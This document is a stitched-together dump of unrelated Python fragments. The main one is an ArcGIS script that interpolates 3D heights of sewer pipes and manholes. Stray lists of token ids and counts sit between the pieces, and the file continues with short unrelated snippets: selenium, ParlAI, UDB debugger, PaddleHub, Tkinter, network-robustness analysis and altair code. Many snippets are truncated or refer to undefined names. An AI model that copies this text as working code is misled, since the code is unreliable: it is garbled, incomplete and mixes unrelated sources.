# -------------------------------------------------------------------------------------#
def copyFeature(input, output):
"""Copies a feature class to another destination.
:param string input: The feature class to copy.
:param string output: The destination path to copy to. If .shp is not the end of the string, it will be appended.
"""
if output[-4:] != ".shp":
output += ".shp"
updateProgress("Kopiere Feature {0}...".format(input))
arcpy.CopyFeatures_management(input, output)
def convertFeatureToPoints(featureClass):
"""**Converts a feature class to Points, creates Geometry attribute fields and adds an ID based on X/Y-coordinates.**
*Does not overwrite the input.*
:param string featureClass: The feature class to convert.
:returns: void
"""
if featureClass[-4:] != ".shp":
featureClass += ".shp"
featureName = featureClass[:-4]
feature = featureClass
# Convert lines to points
oldType = arcpy.Describe(feature).shapeType
updateProgress("Konvertiere Vertices zu Punkten in {0}...".format(feature))
createPath = output_path + "\\" + featureName + "_toPoints" # Use featureName to write new feature
arcpy.FeatureVerticesToPoints_management(feature, createPath, "ALL")
# arcpy.AddMessage("{0} erfolgreich von {1} zu Point konvertiert.".format(feature, oldType))
# Calculate Geometry Attributes
feature = featureName + "_toPoints.shp" # From now on, work with converted feature
featureName = featureName + "_toPoints"
# Add coordinate fields (ArcGIS 10.7 and up)
updateProgress("Berechne Punkt-Koordinaten in {0}...".format(feature))
arcpy.AddGeometryAttributes_management(feature, "POINT_X_Y_Z_M")
arcpy.DeleteField_management(feature, "POINT_M") # Delete, is never used
# Following method for 10.6 and below
# arcpy.AddField_management(featureClass, field_prefix + "_X", "DOUBLE")
# arcpy.AddField_management(featureClass, field_prefix + "_Y", "DOUBLE")
# arcpy.CalculateGeometryAttributes_management(featureClass, [["_X"], ["POINT_X"]])
# arcpy.CalculateGeometryAttributes_management(featureClass, [["_Y"], ["POINT_Y"]])
# Calculate XY-ID
field_prefix = featureClass[0:1]
arcpy.AddField_management(feature, field_prefix + "_XY", "DOUBLE")
arcpy.CalculateField_management(feature, field_prefix + "_XY", "[POINT_X] + [POINT_Y]")
updateProgress("{0} erfolgreich berechnet.".format(feature))
#-------------------------------------------------------------------------------------#
def recalculate3DPointCoordinates(feature):
"""Deletes previous POINT_* coordinates and creates new ones.
:param string feature: The feature class to work with.
:return:
"""
if feature[-4:] != ".shp":
feature += ".shp"
# Delete previous ones if they exist
fields = [f.name for f in arcpy.ListFields(feature)]
if "POINT_X" in fields:
if showWarnings:
arcpy.AddMessage("Warnung: Entferne Feld POINT_X, um es neu zu schreiben...")
arcpy.DeleteField_management(feature, "POINT_X")
if "POINT_Y" in fields:
if showWarnings:
arcpy.AddMessage("Warnung: Entferne Feld POINT_Y, um es neu zu schreiben...")
arcpy.DeleteField_management(feature, "POINT_Y")
if "POINT_Z" in fields:
if showWarnings:
arcpy.AddMessage("Warnung: Entferne Feld POINT_Z, um es neu zu schreiben...")
arcpy.DeleteField_management(feature, "POINT_Z")
# Calculate new coordinates
updateProgress("Berechne Punkt-Koordinaten in {0}...".format(feature))
arcpy.AddGeometryAttributes_management(feature, "POINT_X_Y_Z_M")
arcpy.DeleteField_management(feature, "POINT_M") # Delete, is never used
def interpolateFeatureZ(featureClass, matchFieldID, referenceClass, refFieldX, refFieldY, refFieldID):
"""Interpolates the Z value of a point feature based on a reference feature. Usage: Adjust a point on a line between to other points.
:param string featureClass: The feature class to adjust.
:param string matchFieldID: The name of the field in featureClass to match against refFieldID in referenceClass
:param string referenceClass: The feature class to reference for start and end point.
:param string refFieldX: The name of the field the reference X values are stored in.
:param string refFieldY: The name of the field the reference Y values are stored in.
:param string refFieldID: The name of the field to be matched against with matchFieldID.
:returns: void
"""
if featureClass[-4:] != ".shp":
featureClass += ".shp"
# Util variables
saved_fid = None
cIndex = 0
adjustedPoints = 0
field_prefix = featureClass[0:1]
# Using the new data-access search cursor, because getValue() doesn't work for the old one, somehow
fields = [f.name for f in arcpy.ListFields(featureClass)]
refFields = [f.name for f in arcpy.ListFields(referenceClass)]
# Find indexes for field names
# Source feature ↓
xIndex = fields.index("POINT_X")
yIndex = fields.index("POINT_Y")
zIndex = fields.index("POINT_Z")
xyIndex = fields.index(field_prefix + "_XY")
fidIndex = fields.index("FID")
matchFieldIndex = fields.index(matchFieldID)
# Reference feature ↓
refIndexX = refFields.index(refFieldX)
refIndexY = refFields.index(refFieldY)
refIndexZ = refFields.index("Z")
refIndexXY = refFields.index("schacht_XY")
# Build delimited field names (can cause SQL issues if not done)
matchFieldIDdelimited = arcpy.AddFieldDelimiters(featureClass, matchFieldID)
FIDdelimited = arcpy.AddFieldDelimiters(featureClass, "FID")
refFieldIDdelimited = arcpy.AddFieldDelimiters(referenceClass, refFieldID)
# Fetch cursor into array to minize cursor usage
rows = [row for row in arcpy.da.UpdateCursor(featureClass, "*", sql_clause=(
None, "ORDER BY {0}, {1}".format(matchFieldIDdelimited, FIDdelimited)))]
refRows = [row for row in arcpy.da.SearchCursor(referenceClass, "*")]
rowCount = len(rows)
pointInfo = [] # Stores [lengthToStart, baseLength, difToOriginal]
for row in rows:
if saved_fid == row[matchFieldIndex]:
continueLine = True
else:
continueLine = False
# Reset found references if line isn't continued
startPoint = None
endPoint = None
startRef = None
endRef = None
saved_fid = row[matchFieldIndex]
updateProgress("Verarbeite Punkt {0}/{1}... (Datenabfrage)".format(cIndex, rowCount))
if not continueLine:
# Get start+end points for line the current point was originally on
for e in range(cIndex, rowCount):
row2 = rows[e]
if saved_fid == row2[matchFieldIndex] and not startPoint:
startPoint = row2
if saved_fid == row2[matchFieldIndex] and startPoint:
endPoint = row2
if startPoint and endPoint and saved_fid != row2[matchFieldIndex]:
break;
if not startPoint or not endPoint:
if showWarnings:
arcpy.AddMessage("Warnung: Start- oder Endpunkt in Haltung von Punkt {0} nicht gefunden.".format(cIndex))
pointInfo.insert(cIndex, [0, 0, 0, saved_fid, row[zIndex]])
row[zIndex] = 0
cIndex += 1
continue
if not continueLine:
# Find reference points based on start and end point
for refRow in refRows:
if refRow[refIndexXY] == startPoint[xyIndex]:
startRef = refRow
if refRow[refIndexXY] == endPoint[xyIndex]:
endRef = refRow
if startRef and endRef:
break
if not startRef or not endRef:
if showWarnings:
arcpy.AddMessage("Warnung: Start- oder Endpunkt in Referenz von Punkt {0} nicht gefunden.".format(cIndex))
pointInfo.insert(cIndex, [0, 0, 0, saved_fid, row[zIndex]])
row[zIndex] = 0
cIndex += 1
continue
updateProgress("Verarbeite Punkt {0}/{1}... (Berechnung)".format(cIndex, rowCount))
if not continueLine:
# Calculate base values
xLength = startRef[refIndexX] - endRef[refIndexX]
yLength = startRef[refIndexY] - endRef[refIndexY]
baseLength = (xLength ** 2) + (yLength ** 2)
# Calculate distance from start and end point
xLength = row[xIndex] - startRef[refIndexX]
yLength = row[yIndex] - startRef[refIndexY]
toStartLength = (xLength ** 2) + (yLength ** 2)
# Calculate Z-values
startZ = startRef[refIndexZ]
endZ = endRef[refIndexZ]
zDif = startZ - endZ # Can be negative and should be able to
distanceFactor = math.sqrt((toStartLength / baseLength))
newZ = startZ - (distanceFactor * zDif) # Calculate new Z coord based on distance to start point
difToOriginal = newZ - row[zIndex]
if difToOriginal <= .2:
difToOriginal = 0 # Prevents pulling lines downwards + keeps already specific data in shape
pointInfo.insert(cIndex, [math.sqrt(toStartLength), math.sqrt(baseLength), difToOriginal, saved_fid, row[zIndex]])
row[zIndex] = difToOriginal
adjustedPoints += 1
cIndex += 1
if subInterpolate:
# Interpolation within lines, taking non-adjusted points as reference
updateProgress("Sub-Interpolation...")
cIndex = 0
for row in rows:
updateProgress("Verarbeite Punkt {0}/{1}...".format(cIndex, rowCount))
if row[zIndex] == 0:
cIndex += 1
continue
toStartLength = pointInfo[cIndex][0]
baseLength = pointInfo[cIndex][1]
difToOriginal = pointInfo[cIndex][2]
lineID = pointInfo[cIndex][3]
originalZ = pointInfo[cIndex][4]
# Find previous and next non-adjusted point within line
sIndex = cIndex
while sIndex > 0 and lineID == pointInfo[sIndex][3] and pointInfo[sIndex][2] != 0:
sIndex -= 1
eIndex = cIndex
while eIndex < len(pointInfo) and lineID == pointInfo[eIndex][3] and pointInfo[eIndex][2] != 0:
eIndex += 1
# Only sub-interpolate when points have been found
if sIndex != cIndex and eIndex != cIndex:
# Create new reference data
zDif = pointInfo[eIndex][4] - pointInfo[sIndex][4]
baseLength = pointInfo[eIndex][0] - pointInfo[sIndex][0]
toStartLength = pointInfo[cIndex][0] - pointInfo[sIndex][0]
if toStartLength > 0 and baseLength > 0:
distanceFactor = toStartLength / baseLength
newZ = pointInfo[sIndex][4] - (distanceFactor * zDif) # Calculate new Z coord based on distance to start point
difToOriginal = newZ - (pointInfo[cIndex][4] + row[zIndex])
row[zIndex] += difToOriginal
adjustedPoints += 1
cIndex += 1
updateProgress("Schreibe interpolierte Punkte in Feature...")
rIndex = 0
with arcpy.da.UpdateCursor(featureClass, fields, sql_clause=(None, "ORDER BY {0}, {1}".format(matchFieldIDdelimited, FIDdelimited))) as cursor:
for row in cursor:
row[zIndex] = rows[rIndex][zIndex]
cursor.updateRow(row)
rIndex += 1
updateProgress("Passe Geometrie auf Tabellenwerte an...")
arcpy.Adjust3DZ_management(featureClass, "NO_REVERSE", "POINT_Z")
updateProgress("Alle Punkte in {0} erfolgreich interpoliert!".format(featureClass))
# -------------------------------------------------------------------------------------#
def adjust3DZbyReference(featureA, matchA, groupA, featureB, matchB):
"""Takes Z values from featureB and transfers them to featureA where matchA = matchB.
Assumes the input feature contains 3D points.
Group parameter is currently ignored.
:param string featureA: The feature class to adjust.
:param string matchA: The name of the field in featureClass to match against matchB in featureB.
:param string groupA: The field to group featureA by.
:param string featureB: The feature class to reference.
:param string matchB: The name of the field to be matched against with matchA.
:returns: void
"""
if featureA[-4:] != ".shp":
featureA += ".shp"
if featureB[-4:] != ".shp":
featureB += ".shp"
updateProgress("Passe 3D-Positionen von {0} an...".format(featureA))
# Fetch all fields of features to reference later
Afields = [f.name for f in arcpy.ListFields(featureA)]
Bfields = [f.name for f in arcpy.ListFields(featureB)]
# Find indexes for field names
AmatchIndex = Afields.index(matchA)
BmatchIndex = Bfields.index(matchB)
AzIndex = Afields.index("POINT_Z")
BzIndex = Bfields.index("POINT_Z")
AgroupIndex = Afields.index(groupA)
# Fetch cursor into array to minize cursor usage
Arows = [row for row in arcpy.da.UpdateCursor(featureA, "*", sql_clause=(
None, "ORDER BY {0}, {1} DESC".format(groupA, "FID")))]
Brows = [row for row in arcpy.da.SearchCursor(featureB, "*")]
ArowCount = len(Arows)
# Util variables
cIndex = 0
adjustedPoints = 0
processGroups = True # Should create a 2D plane of points per line
xyTolerance = .003 # in meters
updateProgress("Suche nach übereinstimmenden IDs von {0}...".format(featureA))
OArows = copy.deepcopy(Arows) # Fastest method to deepcopy array according to https://stackoverflow.com/a/2612990/13756552
for Arow in Arows:
# Set to 0 as default, does not change position
Arow[AzIndex] = 0
for Arow in Arows:
updateProgress("Verarbeite Punkt {0}/{1}...".format(cIndex, ArowCount))
# Only search for match if point isn't adjusted already
#if Arow[AzIndex] == 0:
# Search for matching reference points
searchID = Arow[AmatchIndex]
adjusted = False
for Brow in Brows:
if searchID == Brow[BmatchIndex]:
# Copy the adjustment (NOT the absolute) Z value
Arow[AzIndex] = Brow[BzIndex] - OArows[cIndex][AzIndex]
adjustedPoints += 1
adjusted = True
break
if adjusted:
adjusted = False
# Find connected points, snap overlap in XY to base sewage
rIndex = 0
for Arow2 in Arows:
if Arow2[AgroupIndex] == Arow[AgroupIndex] and not rIndex == cIndex:
if (Arow2[AmatchIndex] > Arow[AmatchIndex] - xyTolerance) and (
Arow2[AmatchIndex] < Arow[AmatchIndex] + xyTolerance):
adjustedPoints += 1
difToOriginal = (OArows[cIndex][AzIndex] + Arow[AzIndex]) - OArows[rIndex][AzIndex]
Arow2[AzIndex] = difToOriginal
else:
adjustedPoints += 1
difToOriginal = Brow[BzIndex] - OArows[rIndex][AzIndex]
if difToOriginal <= .2: difToOriginal = 0
Arow2[AzIndex] = difToOriginal
# Snap all secondary lines to connected primary by XY proximity
sIndex = 0
for Arow3 in Arows:
if (not sIndex == rIndex) and (not sIndex == cIndex) and Arows[sIndex][AzIndex] == 0:
if (Arow3[AmatchIndex] > Arow2[AmatchIndex] - xyTolerance) and (
Arow3[AmatchIndex] < Arow2[AmatchIndex] + xyTolerance):
adjustedPoints += 1
difToOriginal = (OArows[rIndex][AzIndex] + Arow2[AzIndex]) - OArows[sIndex][
AzIndex]
if difToOriginal <= .2: difToOriginal = 0
Arow3[AzIndex] = difToOriginal
# Find points of same group for secondary lines
fIndex = 0
for Arow4 in Arows:
if Arow4[AgroupIndex] == Arow3[AgroupIndex] and not fIndex == sIndex and not fIndex == cIndex and not fIndex == rIndex:
adjustedPoints += 1
difToOriginal = (OArows[sIndex][AzIndex] + Arow3[AzIndex]) - \
OArows[fIndex][AzIndex]
if difToOriginal <= .2: difToOriginal = 0
Arow4[AzIndex] = difToOriginal
fIndex += 1
sIndex += 1
rIndex += 1
cIndex += 1
updateProgress("Schreibe {0} angepasste Punkte in Feature {1}...".format(adjustedPoints, featureA))
rIndex = 0
with arcpy.da.UpdateCursor(featureA, Afields, sql_clause=(
None, "ORDER BY {0}, {1} DESC".format(groupA, "FID"))) as Aupdate:
for AupRow in Aupdate:
if Arows[rIndex][AzIndex] == 0:
# Aupdate.deleteRow()
AupRow[AzIndex] = Arows[rIndex][AzIndex]
Aupdate.updateRow(AupRow)
else:
AupRow[AzIndex] = Arows[rIndex][AzIndex]
Aupdate.updateRow(AupRow)
rIndex += 1
updateProgress("Passe Geometrie von {0} auf Tabellenwerte an...".format(featureA))
arcpy.Adjust3DZ_management(featureA, "NO_REVERSE", "POINT_Z")
updateProgress("{0} Punkte in {1} erfolgreich angepasst!".format(adjustedPoints, featureA))
# -------------------------------------------------------------------------------------#
with Timer("Setup") as timer:
# Initate arcpy progressor
arcpy.SetProgressor("step", "...", 0, 7)
updateProgress("Starte Prozess...")
# Get parameters
haltung_path = arcpy.GetParameterAsText(0)
anschluss_path = arcpy.GetParameterAsText(1)
schacht_path = arcpy.GetParameterAsText(2)
output_path = arcpy.GetParameterAsText(3)
showWarnings = arcpy.GetParameter(4)
subInterpolate = arcpy.GetParameter(5)
# Change workspace to output folder
os.chdir(output_path)
arcpy.env.workspace = output_path
env.overwriteOutput = True
# Copy features to output folder
haltung_out = "haltungen_out.shp"
anschluss_out = "anschluss_out.shp"
schacht_out = "schacht_out.shp"
copyFeature(haltung_path, haltung_out)
copyFeature(anschluss_path, anschluss_out)
copyFeature(schacht_path, schacht_out)
# logFeatureClasses('w') # Can be used to check if features have been copied correctly
with Timer("Zu Punkte konvertieren") as timer:
# Access feature class array and convert data to points
featureClasses = arcpy.ListFeatureClasses()
for featureClass in featureClasses:
if featureClass == anschluss_out or featureClass == haltung_out:
convertFeatureToPoints(featureClass)
# Update base line vertices Z values
with Timer("3D Daten anpassen (Haltungen)") as timer:
interpolateFeatureZ("haltungen_out_toPoints", "ORIG_FID", schacht_out, "schacht_X", "schacht_Y", "schacht_XY")
recalculate3DPointCoordinates("haltungen_out_toPoints")
with Timer("3D Daten anpassen (Anschlussdaten)") as timer:
adjust3DZbyReference("anschluss_out_toPoints", "a_XY", "ORIG_FID", "haltungen_out_toPoints", "h_XY")
# recalculate3DPointCoordinates("anschluss_out_toPoints")
with Timer("Zu Linien konvertieren") as timer:
updateProgress("Wandle anschluss_out_toPoints in Linien um...")
arcpy.PointsToLine_management("anschluss_out_toPoints.shp", "anschluss_out_lines.shp", "ORIG_FID", "ORIG_FID")
updateProgress("Wandle haltungen_out_toPoints in Linien um...")
arcpy.PointsToLine_management("haltungen_out_toPoints.shp", "haltungen_out_lines.shp", "ORIG_FID", "ORIG_FID")
arcpy.AddMessage("Skript erfolgreich beendet und alle Daten verarbeitet!") | [
2,
10173,
38,
1797,
3661,
1968,
198,
2,
198,
2,
1168,
732,
694,
25,
198,
2,
1052,
6603,
268,
18042,
367,
2501,
2150,
82,
12,
3318,
367,
8717,
504,
354,
75,
1046,
19608,
268,
285,
342,
346,
5036,
18042,
3059,
19725,
568,
71,
11925,... | 2.336097 | 9,890 |
import pytest
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
@pytest.fixture
| [
11748,
12972,
9288,
198,
6738,
384,
11925,
1505,
1330,
3992,
26230,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
13,
11284,
13,
17077,
1330,
5313,
32103,
21321,
198,
198,
31,
9078,
9288,
13,
69,
9602,
628,
628,
628
] | 3.289474 | 38 |
from parlai.scripts.eval_model import EvalModel
EvalModel.main(
task='customer_Care',
model_file='/home/xcs224u/project/Task-Oriented-Chatbot-With-Empathy/data/test_models/pretrained_transformer__ed_cc/model',
metrics = ['ppl','f1','accuracy','hits@1'],
# model_file='zoo:bert/model',
# fp16 = False,
num_examples=200,
# optimizer='adam',
) | [
6738,
1582,
75,
1872,
13,
46521,
13,
18206,
62,
19849,
1330,
26439,
17633,
220,
198,
36,
2100,
17633,
13,
12417,
7,
198,
220,
220,
220,
4876,
11639,
23144,
263,
62,
17784,
3256,
198,
220,
220,
220,
2746,
62,
7753,
11639,
14,
11195,
... | 2.339623 | 159 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 17 13:34:41 2018
"""
import requests
import json
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
41972,
319,
30030,
5979,
1596,
1511,
25,
2682,
25,
3901,
2864,
198,
198,
37811,
198,
198,
11748,
7007,
... | 2.489796 | 49 |
import gdb
from undodb.debugger_extensions import udb
def count_calls(func_name):
"""
Counts how many times func_name is hit during the replay of the currently
loaded recording and returns the hit count.
"""
# Set a breakpoint for the specified function.
bp = gdb.Breakpoint(func_name)
# Do "continue" until we have gone through the whole recording, potentially
# hitting the breakpoint several times.
end_of_time = udb.get_event_log_extent().max_bbcount
while udb.time.get().bbcount < end_of_time:
gdb.execute("continue")
return bp.hit_count
# UDB will automatically load the modules passed to UdbLauncher.add_extension
# and, if present, automatically execute any function (with no arguments) called
# "run".
| [
11748,
308,
9945,
198,
198,
6738,
3318,
375,
65,
13,
24442,
1362,
62,
2302,
5736,
1330,
334,
9945,
628,
198,
4299,
954,
62,
66,
5691,
7,
20786,
62,
3672,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
2764,
82,
703,
867,
166... | 3.067729 | 251 |
# pylint: skip-file
# test: subdirs = frm2
# test: setups = pgaa
# test: setupcode = SetDetectors(det)
# typical PGAA application
from nicos import session
loaded_setups = session.loaded_setups
if 'pgaa' in loaded_setups:
printwarning('Execute PGAA specific tests')
sample_motor.status(0)
samplepos.status(0)
maw(shutter, 'open')
read(shutter)
shutter.read(0)
scan(sample_motor, [4, 74, 144, 214, 284, 354])
scan(sample_pos, [0, 1, 2, 3, 4, 5])
maw(shutter, 'closed')
| [
2,
279,
2645,
600,
25,
14267,
12,
7753,
198,
198,
2,
1332,
25,
850,
15908,
82,
796,
1216,
76,
17,
198,
2,
1332,
25,
44266,
796,
279,
4908,
64,
198,
2,
1332,
25,
9058,
8189,
796,
5345,
47504,
669,
7,
15255,
8,
198,
198,
2,
7226... | 2.378505 | 214 |
#!/usr/bin/env python
# -*- coding: utf-8
from distutils.version import StrictVersion
from .common import has_utility, MacDriver
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
198,
6738,
1233,
26791,
13,
9641,
1330,
520,
2012,
14815,
198,
198,
6738,
764,
11321,
1330,
468,
62,
315,
879,
11,
4100,
32103,
628
] | 3.046512 | 43 |
"""
Distributed under the terms of the BSD 3-Clause License.
The full license is in the file LICENSE, distributed with this software.
Author: Jun Zhu <jun.zhu@xfel.eu>
Copyright (C) European X-Ray Free-Electron Laser Facility GmbH.
All rights reserved.
"""
import multiprocessing as mp
from threading import Event
from queue import Empty, Full
import sys
import traceback
import time
from .exceptions import StopPipelineError, ProcessingError
from .f_pipe import KaraboBridge, MpInQueue, MpOutQueue, ZmqOutQueue
from .processors import (
DigitizerProcessor,
AzimuthalIntegProcessorPulse, AzimuthalIntegProcessorTrain,
BinningProcessor,
CorrelationProcessor,
CtrlDataProcessor,
FomPulseFilter, FomTrainFilter,
HistogramProcessor,
ImageProcessor,
ImageRoiPulse, ImageRoiTrain,
ImageTransformProcessor,
PumpProbeProcessor,
XgmProcessor,
)
from ..config import config, PipelineSlowPolicy, ExtensionType
from ..ipc import RedisConnection
from ..ipc import process_logger as logger
from ..processes import register_foam_process
from ..database import Metadata as mt
from ..database import MetaProxy, MonProxy
class ProcessWorker(mp.Process):
"""Base worker class for heavy online data analysis."""
_db = RedisConnection()
@property
@property
@property
def run(self):
"""Override."""
# start input and output pipes
self._input.start()
self._output.start()
if self._extension is not None:
self._extension.start()
if self._detector_extension is not None:
self._detector_extension.start()
data_out = None
while not self.closing:
if not self.running:
data_out = None
self.wait()
self.notify_update()
if data_out is None:
try:
# get the data from pipe-in
data_out = self._input.get()
try:
self._run_tasks(data_out)
except StopPipelineError:
tid = data_out["processed"].tid
self._mon.add_tid_with_timestamp(
tid, n_pulses=0, dropped=True)
logger.info(f"Train {tid} dropped!")
if data_out.get("reset_ma", False):
self._meta.hset(mt.GLOBAL_PROC, "reset_ma", 1)
data_out = None
except Empty:
pass
if data_out is not None:
sent = False
# TODO: still put the data but signal the data has been dropped.
if self._slow_policy == PipelineSlowPolicy.WAIT:
try:
self._output.put(data_out)
sent = True
except Full:
pass
else:
# always keep the latest data in the cache
self._output.put_pop(data_out)
sent = True
if self._extension is not None and sent:
try:
self._extension.put(data_out)
except Full:
pass
if self._detector_extension is not None and sent:
processed = data_out["processed"]
detector, key = data_out["catalog"].main_detector.split()
now = time.time()
bridge_data = {
f"EF_{detector}" : {
key: processed.image.masked_mean,
"metadata": {
"timestamp": now,
"timestamp.sec": int(now),
"timestamp.frac": 0,
"timestamp.tid": processed.tid
} } }
try:
self._detector_extension.put(bridge_data)
except Full:
pass
if sent:
data_out = None
time.sleep(0.001)
def _run_tasks(self, data):
"""Run all tasks for once:
:param dict data: a dictionary which is passed around processors.
"""
for task in self._tasks:
try:
task.run_once(data)
except StopPipelineError as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.debug(repr(traceback.format_tb(exc_traceback))
+ repr(e))
logger.error(repr(e))
raise
except ProcessingError as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.debug(repr(traceback.format_tb(exc_traceback))
+ repr(e))
logger.error(repr(e))
except Exception as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.debug(f"Unexpected Exception!: " +
repr(traceback.format_tb(exc_traceback)) +
repr(e))
logger.error(repr(e))
@property
@property
class PulseWorker(ProcessWorker):
"""Pipeline worker for pulse-resolved data."""
def __init__(self, pause_ev, close_ev):
"""Initialization."""
super().__init__('pulse worker', pause_ev, close_ev)
self._input = KaraboBridge(self._input_update_ev, pause_ev, close_ev)
self._output = MpOutQueue(self._output_update_ev, pause_ev, close_ev)
self._set_processors([
('xgm_proc', XgmProcessor),
('digitizer_proc', DigitizerProcessor),
('ctrl_data_proc', CtrlDataProcessor),
('image_proc', ImageProcessor),
('image_roi', ImageRoiPulse),
('ai_proc', AzimuthalIntegProcessorPulse),
('filter', FomPulseFilter),
('pp_proc', PumpProbeProcessor),
('image_transform_proc', ImageTransformProcessor)
])
class TrainWorker(ProcessWorker):
"""Pipeline worker for train-resolved data."""
def __init__(self, pause_ev, close_ev):
"""Initialization."""
super().__init__('train worker', pause_ev, close_ev)
self._input = MpInQueue(self._input_update_ev, pause_ev, close_ev)
self._output = MpOutQueue(self._output_update_ev, pause_ev, close_ev,
final=True)
self._extension = ZmqOutQueue(ExtensionType.ALL_OUTPUT,
self._extension_update_ev,
pause_ev, close_ev)
self._detector_extension = ZmqOutQueue(ExtensionType.DETECTOR_OUTPUT,
self._extension_update_ev,
pause_ev, close_ev)
self._set_processors([
('image_roi', ImageRoiTrain),
('ai_proc', AzimuthalIntegProcessorTrain),
('filter', FomTrainFilter),
('histogram', HistogramProcessor),
('correlation1_proc', CorrelationProcessor, (1,)),
('correlation2_proc', CorrelationProcessor, (2,)),
('binning_proc', BinningProcessor)
])
| [
37811,
198,
20344,
6169,
739,
262,
2846,
286,
262,
347,
10305,
513,
12,
2601,
682,
13789,
13,
198,
198,
464,
1336,
5964,
318,
287,
262,
2393,
38559,
24290,
11,
9387,
351,
428,
3788,
13,
198,
198,
13838,
25,
7653,
33144,
1279,
29741,
... | 1.90774 | 3,902 |
"""
Test PCA_with_scaling
"""
from gfeat.utils import PCA_with_standard_sample_deviation_scaling
import numpy as np
import pandas as pd
import numpy.testing as npt
| [
37811,
198,
14402,
4217,
32,
62,
4480,
62,
1416,
4272,
198,
37811,
198,
198,
6738,
308,
27594,
13,
26791,
1330,
4217,
32,
62,
4480,
62,
20307,
62,
39873,
62,
7959,
3920,
62,
1416,
4272,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
... | 2.912281 | 57 |
import unittest
from hazelcast.hash import murmur_hash3_x86_32, hash_to_index
| [
11748,
555,
715,
395,
198,
198,
6738,
11595,
417,
2701,
13,
17831,
1330,
4636,
28582,
62,
17831,
18,
62,
87,
4521,
62,
2624,
11,
12234,
62,
1462,
62,
9630,
628
] | 2.666667 | 30 |
"""
settings.index
"""
import zoom
| [
37811,
198,
220,
220,
220,
6460,
13,
9630,
198,
37811,
198,
198,
11748,
19792,
198
] | 2.666667 | 15 |
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
import re
from paddlehub.common import utils
from paddlehub.common.downloader import default_downloader
from paddlehub.io.parser import yaml_parser
import paddlehub as hub
RESOURCE_LIST_FILE = "resource_list_file.yml"
CACHE_TIME = 60 * 10
default_hub_server = HubServer()
| [
2,
15069,
357,
66,
8,
13130,
220,
350,
37382,
47,
37382,
46665,
13,
1439,
6923,
33876,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
1,
198,
2,
345,
743,
407,
779,
428,
2393,
2... | 3.639286 | 280 |
from tkinter import *
import time
root = Tk()
root.title("Tkinter 15min timer")
root.geometry("250x200")
count = 0
compliment = Label(root, text="")
compliment.grid(row=0, column=0)
totalLabel = Label(root, text=f'Total: {count} times')
totalLabel.grid(row=1, column=0)
Label(root, text="What good will I do from now?").grid(row=2, column=0)
Button(root, text="Start", command=start).grid(row=3, column=0)
root.mainloop()
| [
6738,
256,
74,
3849,
1330,
1635,
198,
11748,
640,
198,
198,
15763,
796,
309,
74,
3419,
198,
15763,
13,
7839,
7203,
51,
74,
3849,
1315,
1084,
19781,
4943,
198,
15763,
13,
469,
15748,
7203,
9031,
87,
2167,
4943,
198,
198,
9127,
796,
6... | 2.66875 | 160 |
import math
import numpy as np
from random import randint
from random import sample
import matplotlib.pyplot as plt
import matplotlib.path as mpath
import igraph as ig
from matplotlib import pylab
import pandas as pd
from scipy.stats import ks_2samp as kolmogorov_smirnov_similarity
# Retorna um indice gerados aleatoriamente e sem repetição dentro do intervalo de 0 a n.
# @param numero_total_de_vertices: numero total de vertices do grafo original
# P(f) é o tamanho do componente gigante apos remover uma taxa f de vértices.
# dado uma rede, atacamos os nós de maior grau até que não sobre nenhum. Retorna-se a taxa de nós removidos e o tcg.
# retorna o vértice de maior grau na rede.
# retorna o vértice de maior betweenness na rede.
# retorna o vértice de maior fluxo na rede.
# análise da taxa de remoção e do tamanho do componente gigante
# auxilia em simulações
# Métricas de Rede
# retorna um gráfico sobre o tamanho do componente gigante ao longo das perturbações aplicadas à rede.
# @param uma lista com o resultado dos ataques
# retorna um gráfico sobre o tamanho do componente gigante ao longo das perturbações aplicadas à rede.
# betweeness nas arestas.
# bridges
###################################################################
# Versão 2
# não analisa o estado atual da rede para efetuar a estratégia de ataque.
# ataques feitos com base no estado inicial da rede.
# analisa o estado atual da rede para efetuar a estratégia de ataque.
| [
11748,
10688,
198,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
4738,
1330,
43720,
600,
198,
6738,
4738,
1330,
6291,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
11748,
2603,
29487,
8019,
13,
6978,
355,
285,
6978... | 2.753623 | 552 |
import altair as alt
from altair.utils.schemapi import Undefined, UndefinedType
def _check_catplot_transform(transform, mark):
"""Check to make sure transform is valid for catplot.
Parameters
----------
transform : str or list of strings
Which transform to use. Valid entries are:
'ecdf'
'colored_ecdf'
'eccdf'
'colored_eccdf'
'colored_ecdf'
'box'
'jitter'
'swarm'
['box', 'jitter']
['box', 'swarm']
Returns
-------
output : str of list of string
Transform, as a sorted list if ['box', 'jitter'] or
['box', swarm'].
"""
if mark == 'boxplot':
if transform not in [None, Undefined, 'boxplot', 'box']:
raise RuntimeError('mark and transform do not match.')
transform = 'box'
mark = Undefined
if transform is None:
raise RuntimeError('`transform` must be specified.')
if type(transform) in [tuple, list]:
transform = sorted(transform)
if transform not in ['ecdf',
'colored_ecdf',
'eccdf',
'colored_eccdf',
'box',
'jitter',
'jitterbox']:
raise RuntimeError("""Invalid transform. Valid possibilities are:
'ecdf'
'ecdf_collection'
'colored_ecdf'
'box'
'jitter'
'jitterbox'""")
return transform, mark
